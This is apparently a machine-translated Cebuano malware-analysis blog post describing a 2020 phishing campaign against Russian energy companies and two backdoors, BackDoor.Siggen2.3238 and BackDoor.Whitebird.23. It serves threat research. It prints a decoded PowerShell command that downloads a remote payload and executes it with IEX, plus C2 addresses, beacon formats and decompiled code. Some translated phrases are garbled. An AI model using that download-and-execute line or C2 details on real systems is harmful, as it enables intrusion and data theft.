Ang among kasinatian sa pag-imbestiga sa mga insidente sa seguridad sa kompyuter nagpakita nga ang email mao gihapon ang usa sa labing kasagarang mga agianan nga gigamit sa mga tig-atake aron sa sinugdan makalusot sa giatake nga mga imprastraktura sa network. Ang usa ka walay pagtagad nga aksyon nga adunay usa ka kadudahang (o dili kaayo kadudahan) nga sulat nahimong usa ka entry point alang sa dugang nga impeksyon, mao nga ang mga cybercriminals aktibo nga naggamit sa mga pamaagi sa social engineering, bisan pa nga adunay lain-laing ang-ang sa kalampusan.
Sa kini nga post gusto namon nga hisgutan ang among bag-o nga imbestigasyon sa usa ka kampanya sa spam nga nagpunting sa daghang mga negosyo sa Russian fuel ug energy complex. Ang tanan nga mga pag-atake nagsunod sa parehas nga senaryo gamit ang peke nga mga email, ug walaβy usa nga ingon og nagbutang ug daghang paningkamot sa sulud sa teksto sa kini nga mga email.
Serbisyo sa paniktik
Nagsugod ang tanan sa katapusan sa Abril 2020, sa dihang ang mga analista sa virus sa Doctor Web nakamatikod sa usa ka kampanya sa spam diin ang mga hacker nagpadala usa ka na-update nga direktoryo sa telepono sa mga empleyado sa daghang mga negosyo sa Russian fuel ug energy complex. Siyempre, kini dili usa ka yano nga pagpakita sa kabalaka, tungod kay ang direktoryo dili tinuod, ug ang .docx nga mga dokumento nag-download sa duha ka mga hulagway gikan sa layo nga mga kapanguhaan.
Ang usa niini gi-download sa computer sa user gikan sa news[.]zannews[.]com server. Mamatikdan nga ang domain name susama sa domain sa anti-corruption media center sa Kazakhstan - zannews[.]kz. Sa laing bahin, ang domain nga gigamit diha-diha dayon nagpahinumdom sa laing 2015 nga kampanya nga nailhan nga TOPNEWS, nga migamit sa ICEFOG backdoor ug adunay Trojan control domains nga adunay substring nga "balita" sa ilang mga ngalan. Ang laing makaiikag nga bahin mao nga sa pagpadala sa mga email ngadto sa lain-laing mga nakadawat, ang mga hangyo sa pag-download sa usa ka hulagway naggamit sa lain-laing mga parameter sa hangyo o talagsaon nga mga ngalan sa hulagway.
Kami nagtuo nga kini gihimo alang sa katuyoan sa pagkolekta sa impormasyon aron sa pag-ila sa usa ka "kasaligan" nga addressee, nga unya garantiya sa pag-abli sa sulat sa husto nga panahon. Ang SMB protocol gigamit sa pag-download sa imahe gikan sa ikaduhang server, nga mahimo aron makolekta ang NetNTLM hash gikan sa mga kompyuter sa mga empleyado nga nagbukas sa nadawat nga dokumento.
Ug ania ang sulat mismo nga adunay peke nga direktoryo:
Niadtong Hunyo ning tuiga, ang mga hacker nagsugod sa paggamit ug bag-ong domain name, sports[.]manhajnews[.]com, para mag-upload og mga hulagway. Gipakita sa pag-analisa nga ang manhajnews[.]com subdomain gigamit sa mga spam mail sukad sa labing menos Septyembre 2019. Usa sa mga target niini nga kampanya mao ang usa ka dako nga unibersidad sa Russia.
Usab, sa Hunyo, ang mga nag-organisar sa pag-atake miabut uban ang usa ka bag-ong teksto alang sa ilang mga sulat: niining panahona ang dokumento adunay impormasyon mahitungod sa pagpalambo sa industriya. Ang teksto sa sulat tin-aw nga nagpakita nga ang tagsulat niini dili usa ka lumad nga mamumulong sa Ruso, o tinuyo nga naghimo sa ingon nga impresyon bahin sa iyang kaugalingon. Ikasubo, ang mga ideya sa pagpalambo sa industriya, sama sa kanunay, nahimo nga usa lamang ka tabon - ang dokumento nag-download pag-usab sa duha ka mga hulagway, samtang ang server giusab sa pag-download [.]inklingpaper[.]com.
Ang sunod nga kabag-ohan misunod sa Hulyo. Sa pagsulay sa paglaktaw sa pagkakita sa mga malisyosong dokumento pinaagi sa mga antivirus program, ang mga tig-atake nagsugod sa paggamit sa mga dokumento sa Microsoft Word nga gi-encrypt gamit ang password. Sa parehas nga oras, ang mga tig-atake nakahukom nga mogamit usa ka klasiko nga teknik sa social engineering - pagpahibalo sa ganti.
Ang teksto sa pag-apelar gisulat pag-usab sa parehas nga istilo, nga nakapukaw sa dugang nga pagduda taliwala sa gitumong. Ang server alang sa pag-download sa imahe wala usab mausab.
Timan-i nga sa tanang kaso, ang mga electronic mailbox nga narehistro sa mail[.]ru ug yandex[.]ru nga mga dominyo gigamit sa pagpadala sa mga sulat.
Pag-atake
Sa sayong bahin sa Septyembre 2020, ang oras sa paglihok. Ang among mga analista sa virus nagrekord sa usa ka bag-ong balud sa mga pag-atake, diin ang mga tig-atake nagpadala na usab og mga sulat ubos sa pasangil sa pag-update sa usa ka direktoryo sa telepono. Bisan pa, niining higayona ang attachment adunay usa ka malisyoso nga macro.
Sa pag-abli sa gilakip nga dokumento, ang macro naghimo og duha ka mga file:
- VBS script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, nga gituyo aron maglunsad og batch file;
- Ang batch file mismo %APPDATA%configstest.bat, nga na-obfuscate.
Ang esensya sa trabaho niini naggikan sa paglansad sa Powershell shell nga adunay piho nga mga parameter. Ang mga parameter nga gipasa sa kabhang gi-decode sa mga command:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ingon sa mosunod gikan sa mga sugo nga gipresentar, ang domain diin ang payload gi-download pag-usab nagtakuban isip usa ka news site. Usa ka yano , kansang bugtong tahas mao ang pagdawat sa shellcode gikan sa command and control server ug ipatuman kini. Naila namo ang duha ka matang sa backdoors nga mahimong i-install sa PC sa biktima.
BackDoor.Siggen2.3238
Ang una mao ang BackDoor.Siggen2.3238 β ang among mga espesyalista wala pa makasugat kaniadto, ug walaβy paghisgot sa kini nga programa sa ubang mga tigbaligya sa antivirus.
Kini nga programa usa ka backdoor nga gisulat sa C++ ug nagdagan sa 32-bit nga Windows operating system.
BackDoor.Siggen2.3238 makahimo sa pagpakigsulti sa management server gamit ang duha ka protocol: HTTP ug HTTPS. Ang nasulayan nga sample naggamit sa HTTPS protocol. Ang mosunod nga User-Agent gigamit sa mga hangyo sa server:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Sa kini nga kaso, ang tanan nga mga hangyo gihatag sa mosunod nga hugpong sa mga parameter:
%s;type=%s;length=%s;realdata=%send
diin ang matag linya nga %s gipulihan sa:
- ID sa nataptan nga kompyuter,
- matang sa hangyo nga gipadala,
- gitas-on sa datos sa realdata field,
- datos
Sa yugto sa pagkolekta sa kasayuran bahin sa nataptan nga sistema, ang backdoor nagmugna usa ka linya sama sa:
lan=%s;cmpname=%s;username=%s;version=%s;
diin ang lan mao ang IP address sa nataptan nga kompyuter, ang cmpname mao ang ngalan sa kompyuter, ang username mao ang user name, ang bersyon mao ang linya nga 0.0.4.03.
Kini nga impormasyon nga adunay sysinfo identifier gipadala pinaagi sa usa ka POST nga hangyo sa control server nga nahimutang sa https[:]//31.214[.]157.14/log.txt. Kon sa pagtubag BackDoor.Siggen2.3238 nakadawat sa signal sa HEART, ang koneksyon giisip nga malampuson, ug ang backdoor nagsugod sa nag-unang siklo sa komunikasyon sa server.
Mas kompleto nga paghulagway sa mga prinsipyo sa operasyon BackDoor.Siggen2.3238 anaa sa atong .
BackDoor.Whitebird.23
Ang ikaduhang programa mao ang pagbag-o sa BackDoor.Whitebird backdoor, nahibal-an na namo gikan sa insidente sa usa ka ahensya sa gobyerno sa Kazakhstan. Kini nga bersyon gisulat sa C++ ug gidesinyo nga modagan sa 32-bit ug 64-bit Windows operating system.
Sama sa kadaghanan sa mga programa niini nga matang, BackDoor.Whitebird.23 gidesinyo sa pag-establisar og usa ka naka-encrypt nga koneksyon sa control server ug dili awtorisado nga pagkontrol sa usa ka nataptan nga kompyuter. Gi-install sa usa ka nakompromiso nga sistema gamit ang usa ka dropper .
Ang sampol nga among gisusi usa ka malisyoso nga librarya nga adunay duha ka eksport:
- Google Play
- Pagsulay.
Sa sinugdanan sa trabaho niini, gi-decrypt niini ang configuration hardwired ngadto sa backdoor body gamit ang algorithm base sa XOR operation nga adunay byte 0x99. Ang configuration morag:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Aron masiguro ang kanunay nga operasyon niini, ang backdoor nagbag-o sa kantidad nga gitakda sa uma oras_trabaho mga configuration. Ang natad adunay 1440 bytes, nga nagkuha sa mga kantidad nga 0 o 1 ug nagrepresentar sa matag minuto sa matag oras sa adlaw. Naghimo ug lahi nga hilo alang sa matag interface sa network nga maminaw sa interface ug mangita sa mga pakete sa pagtugot sa proxy server gikan sa nataptan nga kompyuter. Kung makit-an ang ingon nga pakete, ang backdoor nagdugang kasayuran bahin sa proxy server sa lista niini. Dugang pa, susihon ang presensya sa usa ka proxy pinaagi sa WinAPI InternetQueryOptionW.
Gisusi sa programa ang karon nga minuto ug oras ug gitandi kini sa datos sa natad oras_trabaho mga configuration. Kung ang kantidad alang sa katugbang nga minuto sa adlaw dili zero, nan usa ka koneksyon ang gitukod sa control server.
Ang pag-establisar og koneksyon sa server nagsundog sa paghimo og koneksyon gamit ang TLS version 1.0 protocol tali sa kliyente ug sa server. Ang lawas sa backdoor adunay duha ka buffer.
Ang unang buffer naglangkob sa TLS 1.0 Client Hello packet.
Ang ikaduhang buffer naglangkob sa TLS 1.0 Client Key Exchange packets nga adunay yawe nga gitas-on nga 0x100 bytes, Change Cipher Spec, Encrypted Handshake Message.
Sa pagpadala sa usa ka Client Hello packet, ang backdoor nagsulat sa 4 bytes sa kasamtangan nga oras ug 28 bytes sa pseudo-random nga datos sa Client Random nga field, gikalkula ingon sa mosunod:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Ang nadawat nga pakete ipadala sa control server. Ang tubag (Server Hello packet) nagsusi:
- pagsunod sa TLS protocol version 1.0;
- sulat sa timestamp (ang unang 4 bytes sa Random Data packet field) nga gitakda sa kliyente ngadto sa timestamp nga gitakda sa server;
- pagpares sa unang 4 ka bytes human sa timestamp sa Random Data field sa kliyente ug server.
Sa kaso sa gipiho nga mga posporo, ang backdoor nag-andam sa usa ka Client Key Exchange nga pakete. Aron mahimo kini, giusab niini ang Public Key sa Client Key Exchange package, ingon man ang Encryption IV ug Encryption Data sa Encrypted Handshake Message package.
Ang backdoor dayon makadawat sa packet gikan sa command and control server, magsusi nga ang TLS protocol version 1.0, ug dayon modawat ug laing 54 bytes (ang lawas sa pakete). Nakompleto niini ang pag-setup sa koneksyon.
Mas kompleto nga paghulagway sa mga prinsipyo sa operasyon BackDoor.Whitebird.23 anaa sa atong .
Konklusyon ug Konklusyon
Ang pag-analisar sa mga dokumento, malware, ug ang gigamit nga imprastraktura nagtugot kanamo sa pagsulti uban ang pagsalig nga ang pag-atake giandam sa usa sa mga grupo sa APT sa China. Gikonsiderar ang pag-andar sa mga backdoor nga na-install sa mga kompyuter sa mga biktima kung adunay usa ka malampuson nga pag-atake, ang impeksyon nagdala, sa labing gamay, sa pagpangawat sa kompidensyal nga kasayuran gikan sa mga kompyuter sa giatake nga mga organisasyon.
Dugang pa, usa ka lagmit nga senaryo mao ang pag-instalar sa mga espesyal nga Trojan sa mga lokal nga server nga adunay espesyal nga function. Mahimo kini nga mga tigkontrol sa domain, mga server sa mail, mga ganghaan sa Internet, ug uban pa. Ingon sa atong makita sa pananglitan , ang ingon nga mga server labi nga interesado sa mga tig-atake tungod sa lainlaing mga hinungdan.
Source: www.habr.com